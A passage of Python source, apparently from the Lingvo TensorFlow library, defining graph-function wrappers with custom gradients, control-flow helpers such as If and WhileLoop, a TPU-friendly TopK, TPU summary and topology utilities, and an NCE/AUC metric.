# TODO(zhifengc/huangyp): Consider implementing assert_equal
# op replacement for lingvo. As assert_equal doesn't support String on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
def NoOP(*args, **kwargs): # pylint: disable=unused-argument
return tf.no_op()
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
try:
yield
finally:
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _AssertInputsMatch(op, args, implicit_captures):
"""Assert that op's inputs match with args and implicit_captures.
Args:
op: The operation to check.
args: A nested structure representing the explicit arguments of 'op'.
implicit_captures: A nested structure representing the implicitly captured
inputs of 'op'.
Raises:
ValueError: if the number of inputs mismatch.
"""
expected_inputs = Flatten([args, implicit_captures])
expected_num_inputs = len(expected_inputs)
if len(op.inputs) > expected_num_inputs:
raise ValueError(('Too many inputs. The most likely cause is that fwd '
'captures additional tensors: extra inputs %r vs %r '
'captures=%r') % (list(op.inputs), list(expected_inputs),
list(Flatten(implicit_captures))))
if len(op.inputs) < expected_num_inputs:
raise ValueError(('Mismatched inputs to fwd: Found %d vs expected %d: %r'
'. Implicit captures(%d) = %r') %
(len(op.inputs), expected_num_inputs, list(op.inputs),
len(Flatten(implicit_captures)), implicit_captures))
def TensorSpecs(nmap, keep_shape=True):
"""Transforms tensors in the input nested structure to TensorSpecs."""
if nmap is None:
return None
fn = lambda t: tf.TensorSpec(t.shape if keep_shape else None, t.dtype)
return Transform(fn, nmap)
def _DefineDefun(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- output_dtypes: A nested structure compatible with the outputs of `fwd`
containing the corresponding output dtypes.
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
get_dtype = lambda x: x.dtype
arg_dtypes = Flatten(Transform(get_dtype, fwd_sig))
get_shape = lambda x: x.shape
arg_shapes = Flatten(Transform(get_shape, fwd_sig))
# Used to hold the backward function used by Grad, which will be defined if
# bak is set.
sigs = NestedMap()
# Output of this method.
res = NestedMap()
python_grad_func = None
if bak:
def Grad(op, *args):
"""Gradient function for the forward function.
Args:
op: The forward operation.
*args: Gradients wrt op.outputs.
Returns:
Tuple of derivatives.
"""
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs = op.inputs[:len(arg_dtypes)] # The rest are captures.
return sigs.backward(*Flatten([xs, op.outputs, args]))
python_grad_func = Grad
def _SetShape(dst_list, shape_list):
for dst, shape in zip(dst_list, shape_list):
if isinstance(dst, tf.Tensor):
dst.set_shape(shape)
@tf.Defun(*arg_dtypes, python_grad_func=python_grad_func, noinline=noinline)
def Forward(*args):
"""The forward function."""
_SetShape(args, arg_shapes)
with RemoveAssertContext(remove=noinline):
call = lambda: fwd(Pack(fwd_sig, args)) if args else fwd()
if device is None:
# Defun will handle the device assignment.
rets = call()
else:
with tf.device(device):
rets = call()
res.outputs = rets
return Flatten(rets)
forward = Forward
if not arg_dtypes:
# In this case Forward is an _OverloadedFunction, we need to instantiate it.
forward = Forward.instantiate([])
# Invokes fwd() to get res.outputs.
forward.add_to_graph(tf.get_default_graph())
res.func = forward
res.stateful_ops = forward.stateful_ops
res.captured_inputs = forward.captured_inputs
output_dtypes = Transform(get_dtype, res.outputs)
output_shapes = Transform(get_shape, res.outputs)
def Call(args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = forward()
else:
flat_rets = forward(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
_SetShape(flat_rets, Flatten(output_shapes))
return Pack(output_dtypes, flat_rets)
res.call = Call
if bak:
def Backward(*args):
"""The backward function."""
_SetShape(args, Flatten([arg_shapes, output_shapes, output_shapes]))
xs, ys, dys = Pack([fwd_sig, output_dtypes, output_dtypes], args)
with RemoveAssertContext(remove=noinline):
if device is None:
# Defun will handle the device assignment.
dxs = bak(xs, ys, dys)
else:
with tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
sigs.backward = tf.Defun(
*Flatten([arg_dtypes, output_dtypes, output_dtypes]),
noinline=noinline)(
Backward)
sigs.backward.add_to_graph(tf.get_default_graph())
else:
sigs.backward = Backward
return res
# Global variable to control rendezvous sharing in tf.function.
# If False (default) rendezvous sharing is disabled in tf.function, that is, the
# function body use a separate rendezvous and can't communicate with parent
# graph via send/recv.
# With _GetSharedRendezvous() == True, the function body share the same
# rendezvous with the parent graph and can talk to it using send/recv. This is
# useful for layers like StackedRecurrent.
_SHARED_RENDEZVOUS = ThreadLocalStack()
@contextlib.contextmanager
def _SharedRendezvousScope(shared_rendezvous=True):
_SHARED_RENDEZVOUS.stack.append(shared_rendezvous)
try:
yield
finally:
_SHARED_RENDEZVOUS.stack.pop()
def _GetSharedRendezvous():
"""Get the current rendezvous sharing setting."""
return _SHARED_RENDEZVOUS.stack[-1] if _SHARED_RENDEZVOUS.stack else False
def _ApplySharedRendezvous(func):
"""Apply the rendezvous sharing setting on the given tf.function func."""
# pylint: disable=protected-access
func._shared_rendezvous = _GetSharedRendezvous()
# pylint: enable=protected-access
def _WrapFunction(func=None, input_signature=None):
"""Wraps func as a tf.function."""
if input_signature is None:
input_signature = []
def Decorated(fn):
@tf.function(input_signature=input_signature, autograph=False)
def Fn(*args):
# TODO(b/163904067): mimic Defun' behavior and reset the step seed to
# avoid it being used as an implicit capture. This is not a desired
# behavior, it should take the step seed from parent graph instead.
ResetStepSeed()
# Mimic Defun and disable collection sharing.
graph = tf.get_default_graph()
# Don't share summaries collection with parent graph (b/168745134).
graph.clear_collection(tf.GraphKeys.SUMMARIES)
return fn(*args)
_ApplySharedRendezvous(Fn)
# Add the function to the graph so it'll be traced under the current
# context. This is necessary if the function body captures any non-tensor
# values from the environment, like symbolic maps.
cf = Fn.get_concrete_function()
cf.add_to_graph()
return cf
# For the `foo = _WrapFunction(foo, ...)` use case.
if func is not None:
return Decorated(func)
# For the `@_WrapFunction(...)` use case.
return Decorated
def _DefineFunction(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- outputs: The outputs of `fwd`. Used for reflection only (e.g. to get the
output dtypes, shapes, etc).
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
if device is None:
# Get the current device to mimic Defun's behavior.
# pylint: disable=protected-access
device_funcs = tf.get_default_graph()._device_functions_outer_to_inner
device = device_funcs[-1] if device_funcs else None
# pylint: enable=protected-access
# Output of this method.
res = NestedMap()
@_WrapFunction(input_signature=Flatten(fwd_sig))
def Forward(*args):
"""The forward function."""
with RemoveAssertContext(remove=noinline), tf.device(device):
if args:
xs = Pack(fwd_sig, args)
rets = fwd(xs)
else:
rets = fwd()
res.outputs = rets
return Flatten(rets)
res.captured_inputs = Forward.captured_inputs
# Get the stateful ops used in cell_fn. Logic borrowed from
# _EagerDefinedFunction.__init__().
graph = Forward.graph
input_ops = set(arg.op for arg in graph.inputs)
operations = [op for op in graph.get_operations() if op not in input_ops]
res.stateful_ops = [(o.name, o.type) for o in operations if o._is_stateful] # pylint: disable=protected-access
def Call(func, args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = func()
else:
flat_rets = func(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(res.outputs, flat_rets)
if not bak:
res.func = Forward
res.call = lambda args=None: Call(Forward, args)
return res
shared_rendezvous = _GetSharedRendezvous()
ret_specs = TensorSpecs(res.outputs)
def Backward(*args):
xs, ys, dys = Pack([fwd_sig, ret_specs, ret_specs], args)
with RemoveAssertContext(remove=noinline), tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
backward_cf = _WrapFunction(
Backward, input_signature=Flatten([fwd_sig, ret_specs, ret_specs]))
else:
def BackwardWithSharedRendezvous(*args):
with _SharedRendezvousScope(shared_rendezvous):
return Backward(*args)
backward_cf = BackwardWithSharedRendezvous
@tf.custom_gradient
def ForwardWithGrad(*args):
"""Forward function and its custom gradient."""
# Note that `args` includes implicit captures. This is required by
# tf.custom_gradient so that when the Grad() outputs include gradients to
# implicit captures, they match the inputs to ForwardWithGrad().
#
# However, Forward doesn't take implicit captures as input, so we exclude
# them here.
fwd_args = args[:(len(args) - len(Flatten(res.captured_inputs)))]
op = NestedMap(inputs=args, outputs=Forward(*fwd_args))
def Grad(*args, **kwargs):
"""Gradient function for the forward function.
Args:
*args: Gradients wrt op.outputs.
**kwargs: Additional arguments from tf.custom_gradient.
Returns:
Tuple of derivatives.
"""
if kwargs:
tf.logging.warning(
'Ignoring additional arguments used by tf.custom_gradient: %s',
str(kwargs))
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs, _ = Pack([fwd_sig, res.captured_inputs], op.inputs)
return backward_cf(*Flatten([xs, op.outputs, args]))
return op.outputs, Grad
res.func = None
forward = lambda *xs: ForwardWithGrad(*Flatten([xs, res.captured_inputs]))
res.call = lambda args=None: Call(forward, args)
return res
# Global variable to control whether to use tf.function.
# If not set, the result is determined by tf2 status. See _UseTfFunction for
# details.
# TODO(laigd): remove after b/169869929 is fixed.
_USE_TF_FUNCTION = ThreadLocalStack()
# Constants for propagating framework tensors through Function.
_FRAMEWORK_TENSOR_GLOBAL_STEP = '_global_step'
@contextlib.contextmanager
def TfFunctionScope(use_tf_function=True):
_USE_TF_FUNCTION.stack.append(use_tf_function)
try:
yield
finally:
_USE_TF_FUNCTION.stack.pop()
def _UseTfFunction():
"""Whether to use tf.function instead of tf.Defun."""
if _USE_TF_FUNCTION.stack:
return _USE_TF_FUNCTION.stack[-1]
return tf2_enabled()
class Function(object):
"""Function builds a TensorFlow graph function from a callable.
In the high level this is similar to tf.Defun and tf.function. In fact this
relies on those as underlying implementations, but with specific configuration
so it's easier to use and can work well in some extreme cases in Lingvo.
Example usage:
- No inputs:
>>> @Function()
... def foo():
... return tf.constant(1.0)
>>> y = foo()
- Scalar input:
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32))
... def foo(x):
... return x * 2
>>> y = foo(1.0)
- List input:
>>> @Function(fwd_sig=[tf.TensorSpec(None, tf.float32) for _ in range(2)])
... def foo(xs):
... return xs[0] + xs[1]
>>> y = foo([1.0, 2.0])
- Nested input:
>>> @Function(fwd_sig=NestedMap(x=tf.TensorSpec(None, tf.float32)))
... def foo(nmap):
... return nmap.x * 2
>>> y = foo(NestedMap(x=1.0))
- With custom gradient function (other input types mentioned above are also
supported):
>>> def bar(x, y, dy):
... del y, dy
... return 4.0 * x * dy
>>>
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32), bak=bar)
... def foo(x):
... return 2.0 * x * x
- Used in control flow ops:
>>> then_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: x / 2)
>>> else_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: 3 * x + 1)
>>> y = tf.If(cond, inputs, then_branch.func, else_branch.func)
"""
# TODO(laigd): the use_tf_function option is added for backward compatibility
# reasons. Remove it after the migration.
def __init__(self,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Below we assume `fwd` is the input to `__call__` that is used to build the
TensorFlow graph function encapsulated by this object.
Args:
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
self._bak = bak
self._bak_as_function = bak_as_function
self._device = device
self._use_tf_function = use_tf_function
def __call__(self, fwd):
"""Creates a graph function.
Args:
fwd: a callable xs: Nested Structure -> ys: Nested Structure.
Returns:
A DefinedFunction object encapsulating `fwd` as a graph function.
"""
assert callable(fwd)
return DefinedFunction(fwd, self._fwd_sig, self._bak, self._bak_as_function,
self._device, self._use_tf_function)
class DefinedFunction(object):
"""Encapsulates a TensorFlow graph function and its properties."""
def __init__(self,
fwd,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure. Used to
build the TensorFlow graph function that this object encapsulates.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
wrapped_fwd_sig = fwd_sig
fwd_fn = fwd
bak_fn = bak
graph_random_seed = None
if tf.get_default_graph().seed is not None:
graph_random_seed = tf.get_default_graph().seed
# Wrap the forward function to propagate framework tensors like step_seed
# and global_step.
wrapped_fwd_sig = NestedMap()
self._added_global_step = False
if GetGlobalStep() is not None:
wrapped_fwd_sig[_FRAMEWORK_TENSOR_GLOBAL_STEP] = (
tf.TensorSpec([], tf.int64))
self._added_global_step = True
if fwd_sig is not None:
wrapped_fwd_sig.inputs = fwd_sig
elif not wrapped_fwd_sig:
wrapped_fwd_sig = None
def ForwardWrapped(wrapped_inputs=None):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
global_step = None
if wrapped_inputs:
assert isinstance(wrapped_inputs, NestedMap)
global_step = wrapped_inputs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)
with GlobalStepContext(global_step):
if wrapped_inputs and 'inputs' in wrapped_inputs:
result = fwd(wrapped_inputs.inputs)
else:
result = fwd()
return result
fwd_fn = ForwardWrapped
if bak:
# Wrap the backward function to return zero gradients for framework
# tensors like step_seed and global_step.
def BackwardWrapped(wrapped_xs, ys, dys):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
with GlobalStepContext(
wrapped_xs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)):
result = bak(wrapped_xs.inputs, ys, dys)
dxs = Transform(tf.zeros_like, wrapped_xs)
if isinstance(result, tuple) and len(result) == 2:
dxs.inputs, dcapture = result
return dxs, dcapture
else:
dxs.inputs = result
return dxs
bak_fn = BackwardWrapped
if use_tf_function is None:
use_tf_function = _UseTfFunction()
fn = _DefineFunction if use_tf_function else _DefineDefun
self._data = fn(
fwd=fwd_fn,
fwd_sig=wrapped_fwd_sig,
bak=bak_fn,
bak_as_function=bak_as_function,
device=device)
def __call__(self, args=None):
"""Invokes the graph function.
Args:
args: the inputs to the graph function, must be compatible with `fwd_sig`.
Returns:
The output tensors with the same structure as the output of `fwd`,
returned by a call to the graph function.
"""
assert IsCompatible(args,
self._fwd_sig), '{} vs {}'.format(args, self._fwd_sig)
return self._data.call(self.AddFrameworkInputs(args))
@property
def func(self):
"""The underlying TensorFlow graph function that this object encapsulates.
The returned graph function is created by tracing `fwd` during construction.
If not None, it will be a _DefinedFunction or ConcreteFunction that takes
flat inputs and returns flat outputs, and can be used by routines that
require a TensorFlow function object (e.g. tf.If, tf.While, etc).
If no backprop function is provided during construction, the result is
always not None.
"""
return self._data.func
def AddFrameworkInputs(self, inputs):
"""Add framework tensors like step_seed and global_step to inputs.
This is only necessary when using `func`, as wrapping is handled
automatically in __call__.
Args:
inputs: inputs to the function.
Returns:
Inputs wrapped with framework tensors suitable for use with `func`.
"""
result = NestedMap()
if self._added_global_step:
global_step = GetGlobalStep()
assert global_step is not None
result[_FRAMEWORK_TENSOR_GLOBAL_STEP] = tf.cast(global_step, tf.int64)
if inputs is not None:
result.inputs = inputs
return result if result else None
@property
def output_dtypes(self):
"""Output dtypes of the graph function.
The result will have the same structure as the outputs of `fwd` but contain
the corresponding output dtypes.
"""
return Transform(lambda x: x.dtype, self._data.outputs)
@property
def stateful_ops(self):
"""Stateful ops used by `fwd`, as a list of (op_name, op_type) tuples."""
return self._data.stateful_ops
@property
def captured_inputs(self):
"""Implicit input tensors captured by `fwd`."""
return self._data.captured_inputs
def CallDefun(fwd, args=None, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak and calls it with args.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
args: A Nested Structure of tf.Tensor or None.
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for fwd. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for bak.
device: the device on which to run fwd and bak.
Returns:
A Nested Structure equivalent to what fwd(args) computes.
"""
if args is not None:
args = Transform(tf.convert_to_tensor, args)
sigs = Function(
fwd_sig=TensorSpecs(args),
bak=bak,
bak_as_function=bak_as_function,
device=device)(
fwd=fwd)
if args is None:
return sigs()
else:
return sigs(args)
def If(cond, inputs, then_branch, else_branch):
"""Helper to construct an if/else statement.
Args:
cond: A scalar `Tensor` that can be converted to boolean.
inputs: A flattenable representing the input tensors of the if/else
statement. Can be None to represent no inputs.
then_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'else_branch' returns.
else_branch: A callable 'inputs' -> flattenable. The returned value should
be compatible with what 'then_branch' returns.
Returns:
Output returned by the call to either 'then_branch' or 'else_branch'.
"""
fwd_sig = TensorSpecs(inputs)
then_sigs = Function(fwd_sig=fwd_sig)(fwd=then_branch)
else_sigs = Function(fwd_sig=fwd_sig)(fwd=else_branch)
assert IsCompatible(then_sigs.output_dtypes, else_sigs.output_dtypes), (
'Outputs of then_branch and else_branch are not compatible: {} vs {}'
.format(then_sigs.output_dtypes, else_sigs.output_dtypes))
if then_sigs.captured_inputs != else_sigs.captured_inputs:
raise ValueError('Differing captured inputs in then and else. '
'Ensure the same tensors are captured in the same order.')
ret = tf.If(
cond=cond,
inputs=Flatten(then_sigs.AddFrameworkInputs(inputs)) +
then_sigs.captured_inputs,
then_branch=then_sigs.func,
else_branch=else_sigs.func)
return Pack(then_sigs.output_dtypes, ret)
def _Itype():
"""Loop iterator data type."""
return tf.int32 if use_xla() else tf.int64
def WhileLoop(cond, body, loop_state):
"""Helper to construct a while loop.
Args:
cond: A callable NestedMap -> tf.bool.
body: A callable NestedMap -> NestedMap.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
fwd_sig = TensorSpecs(loop_state)
cond_sigs = Function(fwd_sig=fwd_sig)(fwd=cond)
def BodyWrapped(loop_state):
result = body(loop_state)
# loop_state is augmented with global tensors inside of DefinedFunction.
# WhileLoop needs to return the same structure as the inputs, so we augment
# the return value here to match.
result = cond_sigs.AddFrameworkInputs(result)
return result
body_sigs = Function(fwd_sig=fwd_sig)(fwd=BodyWrapped)
wrapped_inputs = body_sigs.AddFrameworkInputs(loop_state)
new_state = tf.While(
Flatten(wrapped_inputs), cond=cond_sigs.func, body=body_sigs.func)
# The functional `While` used above does not have a registered gradient.
# This was not a problem in Graph mode, however in Eager mode,
# GradientTape will attempt to call the gradient of the While op in the
# forward pass. `stop_gradient` is used to pretend the op is a constant
# in the forward pass. This also avoids calling the gradient of other ops in
# `While` in the forward pass.
# Details in https://www.tensorflow.org/api_docs/python/tf/custom_gradient.
# Guarded by 'IsEagerMode' to limit impact.
if IsEagerMode():
new_state = [tf.stop_gradient(t) for t in new_state]
return Pack(wrapped_inputs, new_state).inputs
def ForLoop(body, start, limit, delta, loop_state):
"""Helper to construct a for loop.
Args:
body: A callable (tf.int, NestedMap) -> NestedMap.
start: Loop variable's initial value.
limit: Loop variable's limit value.
delta: Loop variable's change per iteration.
loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
loop state.
Returns:
The final loop state in the same structure as loop_state.
"""
state = NestedMap(
iter=tf.cast(start, _Itype()),
limit=tf.cast(limit, _Itype()),
delta=tf.cast(delta, _Itype()),
loop_state=loop_state)
def LoopCond(state):
return tf.less(state.iter, state.limit)
def LoopBody(state):
state.loop_state = body(state.iter, state.loop_state)
state.iter = tf.add(state.iter, state.delta)
return state
return WhileLoop(LoopCond, LoopBody, state).loop_state
def TopK(x_in, k):
"""Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
assert k <= 2, 'This implementation is only efficient for small k.'
# TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
# 2d tensor, then call tf.math.top_k, and then reshape back.
x_in_shape = x_in.shape
x_rank = x_in_shape.rank
assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
last_dim_size = x_in_shape.as_list()[x_rank - 1]
min_value = tf.math.reduce_min(x_in) - 1.0
out_indices = []
out_values = []
for unused_i in range(k):
index_i = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
mask_i = tf.one_hot(index_i, last_dim_size)
# TODO(yonghui): Would tf.gather be more efficient and numerically stable
# here?
value_i = tf.reduce_sum(mask_i * x_in, -1, keepdims=True)
x_in = (1.0 - mask_i) * x_in + mask_i * min_value
out_indices.append(tf.expand_dims(index_i, -1))
out_values.append(value_i)
if k == 1:
return out_values[0], out_indices[0]
else:
return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
def ReadVariable(var_op):
"""Returns the value of the given variable operation.
Args:
var_op: the `Operation` object for a VarHandleOp.
Raises:
TypeError: if var_op is not a VarHandleOp.
Returns:
A `Tensor` containing the value of the variable.
"""
if var_op.type != 'VarHandleOp':
raise TypeError('var_op should be a VarHandleOp, got %s' % str(var_op.type))
# Filter out the ReadVariableOps that have control dependencies to avoid
# side-effects when the user runs it.
filter_fn = lambda op: op.type == 'ReadVariableOp' and not op.control_inputs
var_readers = list(filter(filter_fn, var_op.outputs[0].consumers()))
assert var_readers
return var_readers[0].outputs[0]
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')
_get_tpu_summary_tensors = _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY,
lambda: [])
def AddTpuSummaryTensor(name, value, weight=1.0):
"""Adds tensor to global collection of summaries.
This needs to be used in situations where tf.summary() could be used but
currently tf.summary is not supported. Use py_utils.AddTpuSummaryTensor() in
low level code to add summary tensors to global collection of summaries.
Then recover all summary tensors from global collection by calling
py_utils.GetTpuSummaryTensors() from top level code (for example from
ComputeLoss method of BaseTask).
In addition to 'name' argument, current tensorflow name scope is also
captured and added to the metric name. This way for example summaries from
a repeated layer will appear as separate graphs in the tensorboard.
Weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss for
the exact definition of weight for eval metrics.
Args:
name: metric name
value: metric value tensor
weight: weight tensor for weighted metrics
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
x = NestedMap()
x.name = name
x.value = value, tf.convert_to_tensor(weight)
x.name_scope = tf.get_default_graph().get_name_scope()
tpu_summary_tensors.append(x)
def GetTpuSummaryTensors():
"""Returns summary tensors from global collection.
Returns:
A dict containing str keys and (metric, weight) pairs as values
"""
tpu_summary_tensors = _get_tpu_summary_tensors()
return {
'%s/%s' % (x.name, SanitizeScopeKey(x.name_scope)): x.value
for x in tpu_summary_tensors
}
def ClearTpuSummaryTensors():
tpu_summary_tensors = _get_tpu_summary_tensors()
del tpu_summary_tensors[:]
def ComputationShape(split_size, topology=None):
"""Decides the computation shape based on the split_size.
Args:
split_size: number of accelerators to use per split.
topology: a serialized string of `tensorflow.tpu.TopologyProto`, or a
`tf.tpu.experimental.Topology` object, that describes the TPU cluster
topology. If not set, it'll use a default setting based on split_size.
Returns:
A 4-element list that describes the computation shape.
"""
if topology:
if isinstance(topology, tf.tpu.experimental.Topology):
topology_info = topology
else:
topology_info = tf_topology.Topology(serialized=topology)
computation_shape = None
if topology and functools.reduce(lambda a, b: a * b,
topology_info.mesh_shape) == split_size:
computation_shape = topology_info.mesh_shape
elif split_size == 1:
computation_shape = [1, 1, 1, 1]
elif topology and topology_info.mesh_shape[
-1] == 1 and split_size in topology_info.mesh_shape:
# For Megacore, if we find exact match on mesh shape, map split_size to it
computation_shape = [1, 1, 1, 1]
computation_shape[topology_info.mesh_shape.tolist().index(
split_size)] = split_size
else:
if topology:
cores_per_chip = topology_info.mesh_shape[-1]
else:
cores_per_chip = 2
assert split_size % cores_per_chip == 0
split_chips = split_size // cores_per_chip
if split_chips == 1:
computation_shape = [1, 1, 1, cores_per_chip]
elif split_chips == 2:
computation_shape = [1, 2, 1, cores_per_chip]
elif split_chips == 4:
computation_shape = [2, 2, 1, cores_per_chip]
elif split_chips == 8:
computation_shape = [4, 2, 1, cores_per_chip]
elif split_chips == 16:
computation_shape = [4, 4, 1, cores_per_chip]
elif split_chips == 32:
if topology and topology_info.mesh_shape[1] == 32:
# Fwd within-replica all-reduces is performed along column;
# Bwd gradient cross-replica all-reduces is performed along row.
# This currently has better performance than the strided patten.
computation_shape = [1, 32, 1, cores_per_chip]
else:
computation_shape = [4, 8, 1, cores_per_chip]
elif split_chips == 64:
computation_shape = [8, 8, 1, cores_per_chip]
elif split_chips == 128:
computation_shape = [8, 16, 1, cores_per_chip]
elif split_chips == 256:
computation_shape = [16, 16, 1, cores_per_chip]
elif split_chips == 512:
computation_shape = [16, 32, 1, cores_per_chip]
elif split_chips == 1024:
computation_shape = [32, 32, 1, cores_per_chip]
elif split_chips == 2048:
computation_shape = [64, 32, 1, cores_per_chip]
elif split_chips == 4096:
computation_shape = [128, 32, 1, cores_per_chip]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
def GetExtraVars():
"""Returns the captured variables by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.variable_captures
return function.get_extra_vars()
def GetExtraInputs():
"""Returns the captured input tensors by the function."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.external_captures
return function.get_extra_inputs()
def GetExtraArgs():
"""Returns the corresponding function arguments for the captured inputs."""
g = tf.get_default_graph()
if isinstance(g, func_graph.FuncGraph):
return g.internal_captures
return function.get_extra_args()
def ShardedFilePatternToGlob(file_pattern):
"""Converts a file pattern path@shards to path-?????-of-shards."""
if ',' in file_pattern:
raise ValueError(
'ShardedFilePatternToGlob does not support multiple file patterns.')
if '@' not in file_pattern:
return file_pattern
path, shards = file_pattern.split('@')
if shards == '*':
return f'{path}-?????-of-*'
return f'{path}-?????-of-{int(shards):05}'
def ComputeNceAndAuc(probs, targets, mask):
"""Compute normalized cross entropy and AUC of the PR curve for a batch.
Args:
probs: a tensor of shape [batch, time].
targets: a tensor of shape [batch, time], where each element is either 0 or
1 indicating wrong or correct.
mask: a tensor of shape [batch, time], a mask for hyp sequence.
Returns:
nce: a tensor of shape [1], the normalized cross entropy value.
auc: a tensor of shape [1], the AUC value.
"""
def LogWithClip(tensor, clip_value_min=1e-8):
"""Clip all elements of a tensor to a minimum before taking log."""
return tf.math.log(tf.clip_by_value(tensor, clip_value_min, 1.0))
bce = -targets * LogWithClip(probs) - (1 - targets) * LogWithClip(1 - probs)
num_cor = tf.reduce_sum(targets * mask)
num_tokens = tf.reduce_sum(mask)
wcr = num_cor / num_tokens
entropy = -wcr * LogWithClip(wcr) - (1 - wcr) * LogWithClip(1 - wcr)
avg_conditional_entropy = tf.reduce_mean(tf.boolean_mask(bce, mask))
nce = (entropy - avg_conditional_entropy) / entropy
auc = tf.metrics.auc(targets, probs, mask, curve='PR')[1]
